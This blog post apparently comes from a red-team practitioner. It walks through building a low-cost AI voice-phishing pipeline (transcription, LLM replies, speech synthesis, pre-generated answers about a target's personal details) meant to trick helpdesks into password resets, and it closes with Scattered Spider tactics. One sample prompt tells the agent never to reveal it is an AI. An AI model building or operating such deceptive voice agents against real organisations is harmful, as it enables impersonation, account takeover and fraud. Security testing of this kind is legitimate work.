Developing An AI Vishing Model For £37.49

2025 was arguably the year of vishing, with the technique rapidly exploding in popularity within both red teams and real world threat actors, such as Scattered Spider. Having done some vishing myself, it can be a very nerve wracking thing to do, requiring you to be calm and think on the spot if you are challenged. Alongside this, I have wanted to improve my ability with AI models and concepts, so developing a AI based vishing toolset felt like a natural fit.

For added fun, I wanted to try and do this as cheaply as possible, using free or low tier tools and licences where possible. This again has two benefits – if the tool can work somewhat well on a low tier licence, then it will fly when given a higher bandwidth API. Additionally, it will force me to be more efficient and considered with my coding, rather than just throwing cash at more powerful APIs or EC2 instances.

This project had a few key aims which I wanted to deliver – hopefully placing it above other proof of concepts which exist, and may allow it to be used in real red team exercises. These aims were:

  • Modular design, allowing for voice generation and transcription models to be changed
  • Logging and IOCs tracked throughout by default
  • The ability to eavesdrop and alter the conversation, if the AI agent is going off track
  • Designed to allow testing and benchmarking to be performed easily
  • Sub 1s response time following incoming audio, though ideally even lower!

The aim of this blog is to highlight the decisions taken and add to the conversation around AI generated vishing. A number of detailed code samples will be skipped or not fully covered in this blog, so apologies for any big gaps or jumps in capability 😉

For anyone interested in this subject, ElevenLabs have some great blog posts. For example, they have a summary of how conversational AI agents are designed at a high level.

Milestone 1 – Basics

Initial Structure + Text To Speech

To start, lets make a basic model which needs to have a structure we can extend from. This needs to implement the core functionality for the toolset, allowing us to take an input audio source and convert an audio response from it. These steps are:

  • File/Input handler
  • Speech to Text (STT)
  • Text Generation (TG)
  • Text to Speech (TTS)
  • Output the audio

In order to test this, we will need some audio content. For a super dumb example, we can use https://ttsmp3.com/ to generate a basic script which we might face when vishing, helpfully we can add realistic pauses into the generated content where the agent wont be speaking. Below is a sample of the script used.

Hello, this is Test Help Desk 1, my name is John Smith. How can I help you? A password reset? Okay, what is your name please? Thank you Peter. What is your internal ID?

Now we have an audio file, lets start looking into audio transcription. This will allow us to convert input audio into text, so that we can then interface with an LLM of our choice whilst generating a response.

Side Note

This approach may not be the most performant, as it requires us to transcribe audio and then feed it to an LLM for each section of audio. This introduces a fair amount of latency due to us performing two transformations, rather than sending it straight to a service which can transcribe and generate text for us. My logic here was that the flexibility offered by choosing our own LLM is more important than out and out speed. With more powerful VMs in production usage, the performance hit should be low!

To ensure we can alter settings easily whilst producing this, each model and tool will have a YAML config. For example, the faster-whisper library was used initially, which then had the following config. This is heavily based on the default example for those familiar!

model:
  type: small
  device: cpu
  compute_type: int8
  cpu_threads: 8
transcribe:
  beam_size: 1
  vad_filter: true
  language: en # Null for auto-detect
  best_of: 1
  word_timestamps: false
  chunk_length: 60
  vad:
    min_silence_duration_ms: 100
    speech_pad_ms: 80

To control the features, I made a basic controller to handle the coordination of reading audio files through to outputting a response, using the various steps mentioned earlier. This script will take a number of parameters, so we could alter between inputting file based audio, input based (Microphone) and others in future. Before we can do an end to end generation, lets test the transcription works.

DEBUG:Main:Starting transcription
DEBUG:Main:Audio transcription - 8007.0ms
 Hello, this is Test Help Desk 1, my name is John Smith. How can I help you? A password reset? Okay, what is your name please? Thank you Peter. What is your internal ID?

This shows the script works fine (Ignoring the slow transcription!), though currently this requires us to have the full text ready to be transcribed at once – for a call we will need to perform live transcription by recognising when pauses have occured.

To get around this, we can use the detect_nonsilent function from pydub to detect any silent moments, allowing us to split the audio up into questions or natural pauses in conversations.

# Detect non-silent chunks
    nonsilent_ranges = detect_nonsilent(
        audio,
        min_silence_len=config['min_silence_len'],
        silence_thresh=config['silence_thresh'],
        seek_step=config['seek_step']
    )

# Process each segment
    segment_count = 0
    time_str = int(time.time())
    for i, (start_ms, end_ms) in enumerate(nonsilent_ranges):
        temp_file_name = path.join(TEMP_FOLDER, f"{time_str}_{i}.mp3")

        # Add silence padding if requested
        start_with_padding = max(0, start_ms - config['keep_silence'])
        end_with_padding = min(len(audio), end_ms + config['keep_silence'])
        
        # Extract segment
        segment = audio[start_with_padding:end_with_padding]
        segment.export(temp_file_name, format="mp3")
        logger.debug(f"Found new chunk of audio, length = {segment.duration_seconds}s")
        logger.debug(f"Chunked audio saved to {temp_file_name}, Chunk number = {i + 1}")
        
        # Invoke callback with segment and its index
        callback(temp_file_name)
        segment_count += 1
    
    return segment_count

We can then save each ‘chunk’ to disk, using the pause as a trigger for generating the response and then synthesising it to a audio response. This works well, with text being split out as expected.

DEBUG:STT:Audio transcription - 6132.0ms
INFO:STT:Transcribed audio =  Hello, this is test help desk one.
DEBUG:STT:Audio transcription - 4590.0ms
INFO:STT:Transcribed audio =  My name is John Smith. How can I help you?
DEBUG:STT:Audio transcription - 4602.0ms
INFO:STT:Transcribed audio =  A password reset

Code Structure

Around this point I realised I needed to actually structure the code I was generating. One big aim for the project was to allow for swapping of different configurations and platforms without complex code alterations. Naturally, this led me to making an interface for the various components – allowing for the underlying provider to be changed, whilst the functions remain and behave the same.

For example, our speech to text (STT) interface started with just a simple transcription function

class STT:
    def transcribe_audio(self, content, format : AudioFormat):
        pass

Which is then used by Whisper in our current example

class FasterWhisper(STT):
    def __init__(self):
        self.config = loader.load_config("stt", "faster_whisper")

    def transcribe_audio(self, file_name):
        # model sizes: tiny, base, small, medium, large-v3 (bigger = better & slower)
        model = WhisperModel( ...

Likewise, to allow for better extensibility in future, I altered the controller function to ensure that one function is in charge of handling the scheduling and coordination of our workflow:

  • Transcribe incoming audio
  • Generate a response
  • Synthesise a response
  • Log our activity
  • Allow us to perform benchmarking

This controller then instantiates another class to handle each instance of this workflow – allowing us to track the messages sent and avoid recreating too many resource-intensive actions (Such as initiating TTS/LLM models etc). At a high level, our controller looks like this:

class GenerationExecution:
    def __init__(self, controller, audio_file):
        self.audio_file = audio_file
        self.controller = controller

        self.transcribed_text = ""
        self.generated_text = ""

        # Convert the audio to text
        stt_handler_obj = stt_handler.STTHandler(self.controller.stt_model, audio.AudioFormat.FILE)
        self.transcribed_text = stt_handler_obj.handle_stt(audio_file)
        self.controller.add_message_history("user", self.transcribed_text)

        # Then forward onto our text generation
        self.text_gen_generation()

        # Then generate audio in time
        self.tts_generation()

...

class Controller:
    def __init__(self, stt_model, text_gen_model, tts_model):
        self.stt_model = stt_model
        self.text_gen_model = text_gen_model
        self.tts_model = tts_model

    def generate_response(self, input_audio):
        self.generation_exection_runs.append(GenerationExecution(self, input_audio))

Now back to the fun stuff!

Text Generation

At this point, I needed to make a text generation system. To start, I created an Anthropic account and put 5 hard earned dollars into my new account. There are many other providers out there, Im simply just more familiar with Anthropic from previous projects. Using the Messages API, we can make a request to Claude as a chatbot. There are two prompts we can define:

  • System
    • The ‘base’ prompt, containing the formatting, guidelines and expectations.
    • This is the same for all requests, and wont change
  • Messages/User
    • This is the data we processed from our victim, so will be questions from a helpdesk agent and so on!

As always, we will place both of these into configuration files, so we can alter them easily. From a quick test run, we can see that Claude makes sensible responses as expected.

Message 1:  Hello, this is test help desk one.
Message 2: Hi there, I'm calling because I need help with resetting my password.
Message 3:  My name is John Smith. How can I help you?
Message 4: Hi John, I'm Peter Bloggs. I've been locked out of my account and need to get my password reset please.
Message 5:  A password reset
Message 6: Yes, that's right. I can't seem to get into my account at all.
Message 7:  Okay, what is your name please?
Message 8: It's Peter Bloggs.
Message 9:  Thank you Peter. What is your internal ID?
Message 10: I'm afraid I don't have that to hand. Is there another way you can verify me?

At this point, we are starting to get a pretty messy terminal with debug messages flying everywhere, so lets generate a proper UI for this. A solid but basic UI will allow for a huge amount more to be built in this tool, without me wasting time debugging and digging through text logs manually.

As with all good code, im going to heavily vibe code it using Claude. Using a prompt, we all of a sudden have the majority of the framework built for our interface. For reference, the prompt is below (Though my prompt writing has improved as a result of this project!)

Write a python flask server which has 3 different pages. 

The first is config, which allows users to browse and edit yaml configuration files within a specific directory and should dynamically generate the fields which can be edited based on the file contents. 

Secondly is logs, which displays output from a separate API call, this must be displayed in a table with the following columns: timestamp, id, conversation id, details, type. Change the timestamp to the format of 12:34 1st Jan. Allow for the table to be sorted and filtered. this other API returns a JSON structure from tiny db. 

Finally 'manage', will poll this main API every 100 ms for a specific conversation ID. it should show the same table at the top of the page, then the second half should be split in half, with one half having an input field to allow conversations with a chatbot via an API call - build this framework but dont implement backend chatbot actions. The other half should show another chat-style window based on a separate API call, showing sent and received messages with timestamps - implement the API call but dont perform any backend actions.

The design should be simple and modern, with navigation on the left hand side. Use bootstrap for HTML and jinja for templating. design the site to use a 'base' template which is then extended out for the 3 pages. Use blocks where possible. For the API, define API functions based on JSON output where required, rather than implementing in Python specifically.

With a few tweaks to add better quality-of-life features, such as static file folders and a ‘base’ template for inheriting styling within Jinja, we have a basic interface. The main page is the ‘Manage’ page, which will allow for live inputs to the system, a ‘chat’ window for the conversation and a view of the system’s logs.

We also have a ‘Logs’ view, for viewing logs across all conversations/calls.

And finally, a configuration file manager, so we can tweak the settings via the UI rather than YAML.

Text To Speech

Now for the final piece of the jigsaw – Text To Speech (TTS)! For this, we will use pyttsx3 so that we can test whilst not burning through our free allowance with more mature APIs such as ElevenLabs. We can use the example code to create our TTS engine, allowing us to save the file to disk after playing it back as a response. This is a laughably small section of code to generate responses on the fly, spanning all of 13 lines.

import pyttsx3
from handlers.config import loader
from models.tts import TTS

class PyTTSX3(TTS):
    def __init__(self):
        self.config = loader.load_config("tts", "pyttsx3")
        self.engine = pyttsx3.engine()

    def generate_audio(self, input_text):
        file_path = self.get_file_path()
        self.engine.save_to_file(input_text, file_path)
        return file_path

Now we have a very basic end-to-end vishing tool, except for handling the input and output of data to a vishing interface, which will be tackled later on.

Benchmark

To conclude this first major milestone, I will make a dashboard which shows the metrics associated with each vishing ‘call’. This will allow for a comparison between techniques, and for any improvements to be analysed. At this point I also switched to using SQLite instead of TinyDB, as TinyDB wasnt able to cope with concurrent read/write actions, with significant data loss even at this stage!

As you can see below, this first version is pretty slow, though it is significantly faster than I suspected. This is especially the case given how realistic both the text and audio responses are. Whilst there is significant room for improvement in the quality of the responses, this is very much early days!

The initial benchmarks result in the following performance:

MilestoneSTTText GenerationTTSTotal
1~5500 ms~3500 ms~1300 ms~10000 ms

There are several caveats at this point:

  • Local generation via pyttsx3 is significantly slower than ElevenLabs was using the eleven_turbo_v2_5 model (~1300ms vs ~500ms), though for the purposes of testing I will stick with local methods where possible to keep the spending down. Regardless, the main timesinks here are with TTS and text generation.
  • My personal computer is getting pretty old, so these stats are using CPU only modes on a CPU from 2014…
    • This does mean we can rapidly increase performance by dedicating more resources to it in time though!

Milestone 2

The aim for this milestone is to make the tool more production ready and performant. The site made in Milestone 1 will allow us to debug and investigate performance, so is unlikely to need many changes for this milestone.

Before diving into the more exciting side of things, I moved part of the build process to EC2 Image Builder, which allows for the logic for AMI generation to be split from the deployment infrastructure. We can then extend this in future to handle test frameworks and so on. For now it will help us to speed up deployments by avoiding common build steps, creating the EC2 instances from an AMI. A short sample of the build code is below.

phases = [
      {
        name = "build"
        steps = [
        {
            name   = "MakeDirs"
            action = "ExecuteBash"
            inputs = {
              commands = [
                "sudo mkdir -p /opt/app",
                "sudo chown -R ubuntu:ubuntu /opt/app",
              ]
            }
          },
          {
            name   = "InstallPackages"
            action = "ExecuteBash"
            inputs = {
              commands = [
                "sleep 20",
                "cd /opt/app",
                "sudo apt update",
                "sudo NEEDRESTART_MODE=a apt install unzip python3-virtualenv ffmpeg dos2unix espeak-ng libespeak1 -y",
              ]              
            }
          },

Text Generation

To start with a quick win, the text generation function was tweaked across several areas:

  • Improving the prompt used
  • Assessing other models
  • General performance improvements

Initially, I used Claude to assess my prompt and highlight any improvements, taking it from 234 to 119 tokens. Additionally, I switched to the ‘Haiku’ model, rather than ‘Sonnet’, which is focused on performance over out and out capability. This simple set of tweaks dropped the text generation down to ~2250ms, saving us over a full second on the response, mostly due to the use of the ‘Haiku’ model.

WebSockets

The next fairly major change was to add support for streaming audio formats, which will be the vast majority of use cases for the actual usage of the tool. For example, streaming the audio output from a PBX system into the tool, then streaming data back out. This naturally has significant speed benefits, but comes with a host of bugs and other considerations – who knew how hard it was to know when someone has finished talking and to process the data as soon as possible, whilst not stopping at the wrong time!?

When developing this, I wanted to be able to support multiple conversations from streamed data. This meant generating an ID or key during the initial websocket connection, then using that to ensure data was forwarded to the correct controller. This would allow a single instance of a server to receive multiple calls, which meant I wouldn’t need to restart after each call whilst testing. It in theory could allow for one server to handle multiple vishing calls, though this would lead to a performance hit I am sure!

@socketio.on('input_audio')
def ws_input_audio(chunk):
    session_id = request.sid
    data = b64decode(chunk)

    if session_id not in incoming_streamed_data:
        controller_instance = controller.Controller(main_config['stt']['model'], main_config['text_gen']['model'], main_config['tts']['model'])
        incoming_streamed_data[session_id] = audio.AudioSectionGroup(session_id, controller_instance)
        
    incoming_streamed_data[session_id].add_data(data)
    logger.debug("Received data length = " + str(len(incoming_streamed_data[session_id].data)))

In the early days of this development, this did lead to Claude getting a little exasperated as as data was being processed in an incorrect order.

At this point I also split out the testing and development logic into a separate client.py file. This is within the same folder so that the existing audio processing logic can be re-used, allowing us to have a ‘client’ which can also listen and respond to the output of our vishing server. I also moved the command line parameter functionality to a configuration file, so that logic could again be shared between the client and server. Whilst tying the logic together isnt ideal, given this will inherently be closely linked it felt like a fair trade off in return for the increased complexity, as we will use similar models across both the server and client.

After some tweaking, behaviour was back to what we were seeing before when reading the file directly from disk, with ~9 second response times. This was mainly achieved by using a sleep call to slow down the rate at which the data was being sent via websockets, effectively making the transmission rate of the file match what would be seen if we were using a microphone/live input – rather than it transmitting the entire conversation in milliseconds. Due to the slow speed of the processing, we do still see some ‘non ideal’ behaviour, with responses being generated after the next sentence has begun.

At this point, the logic for the STT/TG/TTS workflow is called whenever we mark a section of audio as being ‘complete’ – if we have found a silent section at the end of the received audio stream. Whilst this isnt perfect, as we will have a natural latency after any response, it works for now. The logic to handle when we trigger this workflow is shown below:

# Save audio segment
segment.export(file_name, format="mp3")
handler.audio_data.section_updated(file_name, duration_with_padding)

if is_speech_ended:
    # This means we have found a silence - aka the end of a bit of speech, which will ultimately lead to triggering the STT/TG/TTS flow
    logger.info(f"Marking segment as complete. Details = {timestamp_data}")
    handler.audio_data.mark_last_section_completed()
elif last_section == None or last_section.completed:
    # We have found the start of a new audio section
    handler.audio_data.add_section(file_name, start_ms_overall, (end_with_padding - duration_with_padding)) 

The key items here are the mark_last_section_completed and section_updated callbacks, which allow us to track when new input has been received, or a sentence has finished. When mark_last_section_completed is called, the below code is called:

# Convert the audio to text
self.speech_to_text()

# Then forward onto our text generation
if self.transcribed_text == "":
    self.controller.activity_handler.insert_activity(Activity(self.controller.id, self.id, activity_type=ActivityType.DEBUG, description="Insufficient Text", details="TG and TTS Skipped"))
else:
    self.text_gen_generation()

    # Then generate audio
    self.text_to_speech()

As you can see, this is is processed sequentially which has significant performance issues but again will work for now whilst we focus on other areas. The section_updated logic will help to future-proof the system, allowing for pre-generation of responses in future potentially.

To The Cloud!

The next step I wanted to explore was deploying the infrastructure to the cloud. Naturally, this was done using Terraform. I also developed a small script to further automate this process and handle some utility functions such as deploying environment variables and creating files, which can be more tricky in pure Terraform.

This is a pretty standard deployment, using AWS to host all of our infrastructure. To start with, I tested using a weedy t3.micro resource, which proved that the theory of the client/server model using AWS was possible (Though horrifically slow). For a point of comparison, I decided to run a series of benchmarks to see what throwing more compute power would do, using four different flavours of EC2, including a GPU-enabled instance (g4dn). This was all done using the following settings:

  • STT – Faster Whisper
  • TG – Anthropic
  • STT – gTTS
    • This was used as pyttsx3 does not work nicely on Linux

Notably, this wont play to the strengths of the GPU with the g4dn model – but this is just for comparison’s sake at this point. The g4dn model was chosen as this uses NVidia GPUs, rather than the g4ad which uses AMD. The delta between g4dn and the t3 family will only increase as we move to more complex processing types and further refinement of the algorithm. All durations below are in milliseconds.

TypeDetailSTTTGTTSTotalRelative Speed
t3.micro2 vCPU, 1GB RAM, no GPU151001200100017400100%
t3.xlarge4 vCPU, 16GB RAM, no GPU91001600100011700~150%
t3.2xlarge8 vCPU, 32GB RAM, no GPU7500100010009700~180%
g4dn.xlarge4vCPU, 16GB RAM, 1 GPU
Using CPU-specific models
550012507507600~230%

This highlights some interesting things:

  • TG dropped a further ~1000ms by hosting in the cloud, due to the higher bandwidth available
  • STT responds well to increasing resources, though increasing resources only goes so far

It is also worth highlighting that by default, AWS accounts cannot create g4dn instances! You need to submit a quota request for “All G and VT Spot Instance Requests”, which correlates to the number of vCPUs you need. Bear in mind that the smallest g4dn instance has 4vCPUs – so you need to request at least 4! I requested 16 but was allowed 8, enough for a g4dn.2xlarge. Later I managed to get this increased to 32 with a follow up request.

CUDA

This small section of text was a few weeks of work and me bashing my head against the wall. Support for CUDA is not especially well documented in my opinion, but eventually I got there! The main key decision here was to switch to using official NVIDIA GPU-Optimized AMI’s, rather than the generic Ubuntu image I was using previously.

This wont work out of the box, so I had to run some additional commands to install the necessary pre-requisites for the various Python libraries. The specific versions of the libraries makes a huge difference, with the cu12 and 12-8 versions respectively matching up with the GPU available at the time of writing.

pip install nvidia-cudnn-cu12
sudo apt install cuda-libraries-12-8
echo "export LD_LIBRARY_PATH=$(python -c "import nvidia.cublas.lib; import os; print(os.path.dirname(nvidia.cublas.lib.__file__))"):/usr/local/cuda-12.8/lib64:\$LD_LIBRARY_PATH" >> ~/.bashrc
source ~/.bashrc

As a point of comparison, STT values drop by several seconds(!) by doing this, halving the time taken per response, by using the same hardware.

TypeDetailSTTTGTTSTotal
t3.2xlarge8 vCPU, 32GB RAM, no GPU7500100010009700
g4dn.xlarge4vCPU, 16GB RAM, 1 GPU
Using CPU-specific models
550012507507600
g4dn.xlarge4vCPU, 16GB RAM, 1 GPU
Using GPU-enabled models
150010007503250

When looking into the data, this figure is somewhat misleading. The first request is notably slower than the subsequent requests, likely as a result of the model being loaded into memory and so on. The actual figure is closer to 1250ms for STT, instead of 1500ms. Therefore, this bottleneck was therefore very high on my list of items to sort!

At the end of this milestone, performance has been significantly improved, largely due to the support for CUDA enabled EC2 instances, as well as a host of tweaks throughout the code.

MilestoneSTTText GenerationTTSTotal
1~5500 ms~3500 ms~1300 ms~10000 ms
2~1500 ms~1000 ms ~750 ms~3250 ms
Improvement360%350%175%300%

Milestone 3

The aim for this milestone is to push closer to usable performance. Whilst a ~3 second response time isn’t bad, this isnt sufficient for real world usage and would rapidly make any helpdesks suspicious of the caller being AI generated or a bot. Some of the key areas which will be tackled here are:

  • Exploring on-host LLMs to increase TG speed
  • Improving code structure

On Host LLMs

There are a range of LLMs out there which run on the host, my priority here was to find one which was easy to use whilst still being performant. A number of solutions required extensive pre-requisites, which may be useful in future but not for now! The option I settled on was Llama CPP, which can be installed with the following:

pip install llama-cpp-python --extra-index-url https://abetlen.github.io/llama-cpp-python/whl/cpu

We need to provide a model to use with llama-cpp, I ended up testing two different models:

Again, this was quite a simple model to use, so long as you are loading a model compatible with llama-cpp. A short sample of the warm up code is below, though more on that shortly!

config = loader.load_config("text_gen", "llama_cpp")
model_path = path.join("hf", config["model"])

if not path.exists(model_path):
    logger.error(f"Model file not found: {model_path}")
    _global_llama_initialized = True
    return None

logger.info(f"Loading LlamaCPP model from {model_path}.")
_global_llama_client = Llama(model_path=model_path, n_gpu_layers=-1, verbose=False)
_global_llama_initialized = True

# Warmup the model
logger.info("Warming up LlamaCPP model.")
try:
    warmup_messages = [
        {"role": "system", "content": "You are helpful."},
        {"role": "user", "content": "Hi"}
    ]
    with _llama_lock:
        _global_llama_client.create_chat_completion(
            messages=warmup_messages,
            max_tokens=1,
            stream=False
        )
    logger.info("LlamaCPP model warmed up successfully")
except Exception as e:
    logger.warning(f"LlamaCPP warmup failed: {e}")

As a point of comparison, I re-used the Bedrock example I had previously created, which would generate 100 tokens in 1.4 seconds (71 TPS), or 160 tokens in 1.9 seconds in a separate test (83 TPS). This highlights one of the current cruxes with AI vishing tools – whilst powerful local GPUs can have high performance, you need a lot of power to increase the TPS and reduce latency.

In my example, you would likely need a g4dn.12xlarge or above to have an equivalent TPS to a simple API call – at a cost of £3/hour vs a practically nothing for an API call. The obvious downside to this is the slow response time, over 1 second just to generate a text response is far too high for use in a real vishing scenario. This doesnt consider the capability of the models as well, with on-host ones generally being less capable from my experience, though increasing the complexity of the models would likely close this gap, should you have a powerful enough system.

Streaming & Warm Ups

Whilst I was pondering how best to get around that slight elephant in the room, I decided to tackle something a bit more in my grasp by adding streaming support to the various handlers, as well as changing the controller to leverage this new functionality. A big advantage of this is that we can start to generate responses whilst we are still processing incoming data, allowing us to further reduce the time taken in our responses, by reducing the Time To First Token (TTFT) value.

Additionally, I shifted the models to use warming up, so that we arent loading the models from cold on the initial request. This can be very significant with larger models, which will have increased resource requirements over what we are currently using, given their high resource requirements.

I also implemented some other strategies which commonly yield performance benefits, though I found they did not lead to noticeable improvements. The first concept involved slimming the system prompt down by around half to reduce the number of tokens transferred. In reality, I found that this was actually quite negative, as responses were now much poorer quality and there was no significant difference in the response time. As the prompt was already reasonably small (~300 tokens), this would likely be of use for larger system prompts, but wasn’t worth the time currently for me.

Another approach was to cache messages, allowing the various models to use cached memory rather than loading the full conversation each time. In theory this is great, though again this did not lead to any improvement for me. Buried within the documentation, Claude states the following:

The minimum cacheable prompt length is:

  • 4096 tokens for Claude Opus 4.5
  • 1024 tokens for Claude Opus 4.1, Claude Opus 4, Claude Sonnet 4.5, Claude Sonnet 4, and Claude Sonnet 3.7 (deprecated)
  • 4096 tokens for Claude Haiku 4.5

With most of our conversations being shorter than that, it wont actually lead to a performance benefit currently. The other models all had similar requirements to Claude.

Audio Pre Generation

Another basic thing to implement was pre-generation of audio content, taking the items we defined in our configuration about the target, such as dates of birth and addresses, then generating typical audio responses if we are prompted for it.

This will likely be a huge timesaver, as we can prepare for any normal questions, skipping the need to perform TTS on them, though we will still need to perform TG as we need to know which audio to use. Though this can allow us to use far simpler and quicker models potentially. With some AI wizardry, we now have a nice shiny page to show this, allowing us to review the audio and regenerate as needed.

I then extended the prompt, so that if it determined that it was being asked for any of these pieces of information, then it should just return that in the response. This means we can then skip TTS for any of those matching questions. For final deployment, the logic will pick up on this and play the relevant audio file – but for now we will just print it to the log!

Putting these two concepts together, we can start to see some promising results, with specific questions now having usable response times (Sub 1s). I decided to extend the analysis page to include two additional metrics:

  • STT Start → First TG Token
    • This shows the time taken from when the caller stops talking, to when we generate our first section of the text response
    • Effectively this is the Time To First Token (TTFT) for both STT and TG combined
  • STT Start → First TTS Chunk
    • This shows the time taken from when the caller stops talking, to when we generate our first section of the audio response
    • Effectively this is the Time To First Token (TTFT) for STT, TG and TTS combined

As a result, some of the values for the STT, TG and TTS columns now do not match with these two new metrics. This is because those columns track the time taken to perform the entire process, rather than the TTFT.

Several things stand out now:

  • I have still yet to properly fix the initialisation bug with STT, as the first request is ~4x slower than others
  • When we can match a response to pre-generated content, it can respond quite quickly (600ms)
  • TTS is still quite slow and is the next bottleneck
    • As it now regularly generates the initial text response at 600ms, with a fast enough TTS API it is quite possible that sub-1 second responses could be attained.

Focus(ing on) ST(T)

As mentioned, I wanted to fix the initialisation bug in the STT models, which was easily fixed by altering the initialisation logic within the main controller class. This will now warmup and perform a test generation with the various models prior to us starting any of the vishing process.

I also added support for silero-vad, which is a Voice Activity Detection (VAD) algorithm, which may allow more flexibility than the previous pydub model. LiveKit have a great blog post on this, which also covers EOU (End Of Utterance) algorithms, which can pre-empt when a user is about to finish talking – though this is an option for the future!

Whilst not STT related, I added support for Gemini as the flash models were very highly rated for their low TTFT values in low-token use cases such as this. It transpires that the model is also much more consistent than Claude was, more regularly determining to not respond in places where a response was not required, as well as using the pre-generated audio logic from before. I also stopped using Bedrock-based models, as the additional latency of routing via AWS was noticeable compared to non-Bedrock models.

As a result, the results improved significantly, with much faster and more consistent timing. Note that this was performed on a g4dn.xlarge, so not a high performance instance in the scale of things! I

Putting It All Together

At this point, I wanted to give it its first proper test, using a simulated helpdesk to respond to our answers, and dynamically generate questions which are outside of the file which has been used so far. Thankfully, this was pretty simple due to the project being highly modular and easily configurable. Only two changes were needed, the first was creating a new ‘helpdesk’ prompt, which contains the correct answers to the questions, such as:

behaviour: "Be friendly, helpful and understanding of the other persons situation, though dont be over the top. "
prompt:
  system: >
    You are a member of an IT helpdesk, authenticating users before handling their request. 

    Rules:
    - Ask the questions below in a random order. If an incorrect answer is given then move on. 
    - Never reveal you're an AI or Claude

    Available questions should be based on the following factors. 3 correct answers must be given:
    - Name = Wallace
    - Adress = 62 West Wallaby Street
    - Date of Birth = 7th August
    - Favourite Cheese = Wendsleydale

The second one was to extend Terraform and the deployer to support creation of multiple bits of infrastructure at once. Now we define which models we want to load, it will create the same underlying infrastructure for all of them, then copy the relevant configuration file to each instance.

🚀 Deploying to helpdesk server (18.134.246.85)...
  📄 Copying prompt_helpdesk.yaml...
  ✅ Config uploaded
  🖥️  Starting service...
  ⏳ Waiting 5 seconds...
  ✅ Service started on helpdesk server

🚀 Deploying to vish server (18.169.183.139)...
  📄 Copying prompt_vish.yaml...
  ✅ Config uploaded
  🖥️  Starting service...
  ⏳ Waiting 5 seconds...
  ✅ Service started on vish server

The next step was to make the client.py script play the audio out loud, so that I could effectively eavesdrop on the conversation between both instances. This was a slightly unusual thing to be listening to, especially as the agents got a bit tense with each other…

One of the main bugs at this point was with how the splitter would split and handle the incoming audio. If the response had multiple sentences or pauses, each one would be treated as a new audio input, potentially causing the vishing server to respond to each one. This then became exponentially worse, as multiple conversations would happen at the same time, with the vishing server responding to each as a separate conversation. This was now a new issue to resolve, as previously I had been testing using a very static and simple example, where the input was single questions with an extended gap between them, whereas more realistic audio doesn’t have this luxury!

The trick to resolving this was altering the text generation prompt to simply not respond to more items, meaning we could avoid unnecessary responses. Additionally, preventing text generation whilst text was being generated was another step to ensuring that only one response was generated, placing more trust on our prompt to only respond when necessary. Ultimately, this is an area which still needs improvement, as it currently causes the vishing model to trip itself up more often than not when given audio with large gaps or unusual content.

As part of now having to juggle both a helpdesk and vishing agent, I further extended the client.py file to add some much needed functionality such as preventing the audio from being played on every call, as well as recording the call to an audio file on disk, which would help for real-world usage.

For the final testing, I switched to using ElevenLabs, which has much more realistic voice models. Given I have a limited free account, I didnt want to burn through this too quickly at the start! As noted in their documentation, the models currently struggle with normalising numbers, so any responses containing a number sound incredibly broken. To bypass this, I simply changed my prompts to use the ‘word’ format of any numbers, instead of using digits in the text, as well as adding support to use an alternate model if the generated text contains numbers.

I chose two different voice models for testing, so that I could tell more easily which agent was speaking, purely for my own amusement I went for the the east Londoner ‘Ricky’ and ‘Ed’ the late night announcer. ElevenLabs has a range of other voices, which are much more normal sounding than the two I went with.

Final Test

At last, we can perform a full test of this system! I have included a full clip of the audio at the end of this post, so you can hear the system for yourself. Ironically the most tricky part of this was getting the helpdesk to provide sensible answers, which took some time to finalise!

We can see the pre-generated responses were used for a number of the questions, helping to speed up response times.

The model was able to handle being challenged, responding with a natural sounding response to the question.

As mentioned, the number of pre-generated responses did lower the response time, with most responses being around the 1 second mark, or slightly over for those which required custom generation. What this diagram doesnt show is the current delay which occurs whilst the model waits for the target to finish talking, before starting STT, which does add a delay into the mix.

Overall, I am really happy with how performant the tool was in the end, as this was only a side project for a few weeks, with the APIs and infrastructure used being very much consumer-grade. To improve this in future, there are several areas I would want to focus on:

  • Adding End Of Utterance (EOU) models to significantly reduce the delay between the target stopping their sentence and us starting generating audio
  • Exploring more powerful systems to run text generation locally, or attempt more expansive pre-generation of anticipated responses
  • Hook this up to a microphone input/output, so that it could be used for real-world use cases (After some further refinement!)
  • Improving the logic to handle edge cases better and improve stability, especially within the algorithm to output audio to the target
  • Explore other AI models to see if faster or improved responses could be possible
  • Harden the prompt and model against prompt injection and other malicious responses

Final Comparisons

Finally, the table below covers what I spent (£37.49). I was amazed at how low the cost of Gemini was, especially given how capable the model was compared to others. Also the free tier of ElevenLabs was suitable for all of my final testing, with gTTS being used to develop and perform earlier testing. AWS made the bulk of the costs, predominantly from the final stages, where two g4dn.xlarge systems were used to power both agents. This stepped up to a g4dn.4xlarge for the vishing server for final testing, which was the maximum permitted by my account quotas, at a cost of ~£2/hour/instance.

ServiceCostTotal
AWS£35.04£35.04
Gemini£0.08£35.12
Anthropic£2.37£37.49
ElevenLabs£0.00£37.49

The milestones show a notable increase from milestones 2 to 3, which was due to improved design of the system and selection of algorithms. Whilst I did not hit my original target of sub-1 second, I am still very happy with the result! Perhaps I can revisit this in future to reach that original goal…

MilestoneSTTText GenerationTTSTotal
1~5500 ms~3500 ms~1300 ms~10000 ms
2~1500 ms~1000 ms ~750 ms~3250 ms
3~450 ms~500 ms~300 ms~1400 ms
Improvement (2-3)330%200%250%230%

Simulating Scattered Spider

Recently Scattered Spider (G1015) have been gathering attention from a range of attacks against UK retail, namely attacks against Marks and Spencer, Harrods and Co-Op. These have led to extensive service disruption, with some firms being able to limit the impacts caused more than others. This is in addition to a range of attacks in previous years against telecommunication and Business Process Outsourcing (BPO) providers. Given the impact felt by the recent attacks against retail firms, understandably other businesses want to assess their defences against such attacks.

Threat Intelligence

To start, let’s summarise the TTPs of Scattered Spider from public threat intelligence sources, along with some ideas on how these can be tested safely. I will focus heavily on the initial stages of a Scattered-Spider attack, as this is the typical focus for most companies, though reviewing the post-exploitation TTPs would also be advisable!

MITRE ATT&CK

Starting with MITRE ATT&CK, under the Scattered Spider group ID of G1015, we can use the MITRE ATT&CK Navigator alongside the MITRE ATT&CK G1015 data, to observe see several TTPs from the threat intelligence ingested by MITRE.

  • Phishing for Information: Spearphishing Service (T1598.001)
  • Phishing for Information: Spearphishing Voice (T1598.004)
  • Gather Victim Identity Information: Credentials (T1589.001)
  • Exploit Public Facing Application (T1190)
  • External Remote Services (T1133)
  • Phishing: Spearphishing Voice (T1566.004)
  • Valid Accounts: Cloud Accounts (T1078.004)

FS-ISAC

